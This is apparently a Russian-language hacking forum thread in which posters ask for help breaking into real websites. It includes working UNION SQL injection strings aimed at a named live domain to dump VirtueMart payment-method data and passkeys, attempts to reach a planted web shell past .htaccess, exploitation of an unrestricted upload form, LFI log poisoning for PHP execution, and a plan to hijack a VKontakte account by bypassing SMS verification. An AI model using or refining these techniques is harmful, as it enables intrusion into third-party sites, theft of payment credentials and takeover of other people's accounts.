есть доступ к консоли машины через скул. Вопрос можно ли открыть там порт для рдп? Я создал учетку но коннект нету вообше.
Устанавливаю в joomla мод com_joomlaxplorer_1.6.3 А он мне выдает ошибку "Внимание! - Не удалось переместить файл" что тут не так?
Тэмплэйты редактировать, там обычно PHP код, языки (х.з. кто-то ляпнул где-то, сам не проверял), Xplorer, и смотри чо там по компонентам есть.
Народ подскажите можно как нибудь обойти htacces, суть в том что шелл залит на сайт DLE даже вычисленна прямая ссылка http://site.ru/category/m.y/d/shell.php но вот там стоит редирект и он выдает ложную страницу что типо файл отсуствует или 403 ошибка.. можно как то обойти?
залила ну ссылка как бы через субдомен т.е site.site/*****/shel.php а вариант с htacces не получается, нашла дырку на сайте был написан самописный скрипт с 3 кнопками обзор и не одна не проверяется на тип файла грузит все подрят, да и сайт не хилый 150 к посещений в день ТИЦ 900 и т д... вот хотелось бы вычислить куда все это заливается... может есть способы? по другим файлам если смотреть то заливаются на субдомен но если так же сгенерировать свою ссылку в No Fold при чем не настоящая страница
Вопрос по LFI. Какие есть пути к логам и где их можно посмотреть? Вот путь , через него я выполнил пхп команду, а где можно посмотреть под разные сервера?
Делаю запрос к БД: index.php?id=-157+union+select+concat_ws(0x3a,payment_method_id, vendor_id, payment_method_name, payment_class, shopper_group_id, payment_method_discount, payment_method_discount_is_percent, payment_method_discount_max_amount, payment_method_discount_min_amount, list_order, payment_method_code, enable_processor, is_creditcard, payment_enabled, accepted_creditcards, payment_extrainfo, payment_passkey),2,3,4+from+jos_vm_payment_method Выводится следующая ошибка: 4:1ayPals_paypal:5:0.00:0:0.00:0.00:0P:0:Y::country."' ORDER BY country_2_code ASC"; $db1->query($q); $url = "https://www.paypal.com/cgi-bin/webscr"; $tax_total = $db->f("order_tax") + $db->f("order_shipping_tax"); $discount_total = $db->f("coupon_discount") + $db->f("order_discount"); $post_variables = Array( "cmd" => "_ext-enter", "redirect_cmd" => "_xclick", "upload" => "1", "business" => PAYPAL_EMAIL, "receiver_email" => PAYPAL_EMAIL, "item_name" => $VM_LANG->_('PHPSHOP_ORDER_PRINT_PO_NUMBER').": ". $db->f("order_id"), "order_id" => $db->f("order_id"), "invoice" => $db->f("order_number"), "amount" => round( $db->f("order_subtotal")+$tax_total-$discount_total, 2), "shipping" => sprintf("%.2f", $db->f("order_shipping")), "currency_code" => $_SESSION['vendor_currency'], "address_override" => "1", "first_name" => $dbbt->f('first_name'), "last_name" => $dbbt->f('last_name'), "address1" => $dbbt->f('address_1'), "address2" => $dbbt->f('address_2'), "zip" => $dbbt->f('zip'), "city" => $dbbt->f('city'), "state" => $dbbt->f('state'), "country" => $db1->f('country_2_code'), "email" => $dbbt->f('user_email'), "night_phone_b" => $dbbt->f('phone_1'), "cpp_header_image" => $vendor_image_url, "return" => SECUREURL ."index.php?option=com_virtuemart&page=checkout.result&order_id=".$db->f("order_id"), "notify_url" => SECUREURL ."administrator/components/com_virtuemart/notify.php", "cancel_return" => SECUREURL ."index.php", "undefined_quantity" => "0", "test_ipn" => PAYPAL_DEBUG, "pal" => "NRUBJXESJTY24", "no_shipping" => "1", "no_note" => "1" ); if( $page == "checkout.thankyou" ) { $query_string = "?"; foreach( $post_variables as $name => $value ) { $query_string .= $name. "=" . urlencode($value) ."&"; } vmRedirect( $url . $query_string ); } else { echo ' '; echo ''; foreach( $post_variables as $name => $value ) { echo ''; } echo ' '; } ?>: Доступа к админке нет. Это можно как-то раскрутить?
http://ethanol.li/techtab.php?id=-157+union+select+concat_ws(0x3a,payment_method_id, vendor_id, payment_method_name, payment_class, shopper_group_id, payment_method_discount, payment_method_discount_is_percent, payment_method_discount_max_amount, payment_method_discount_min_amount, list_order, payment_method_code, enable_processor, is_creditcard, payment_enabled, accepted_creditcards, payment_extrainfo, payment_passkey),2,3,4+from+ilseboc_joom.jos_vm_payment_method+limit+3,1+--+&uri=/products.php?id=157&lang=fr
Здравствуйте! Добыл мыло и хотел бы выслать на него пароль от "вконтакте" но не так все просто как казалось бы, от меня соц. сеть требует ввести номер телефона введенного при регестрации пользователем "вконтакте" и получит на этот номер код для смены пароля. Вопрос:как можно обойти смс и выслать пароль на почту? Взарание спс...
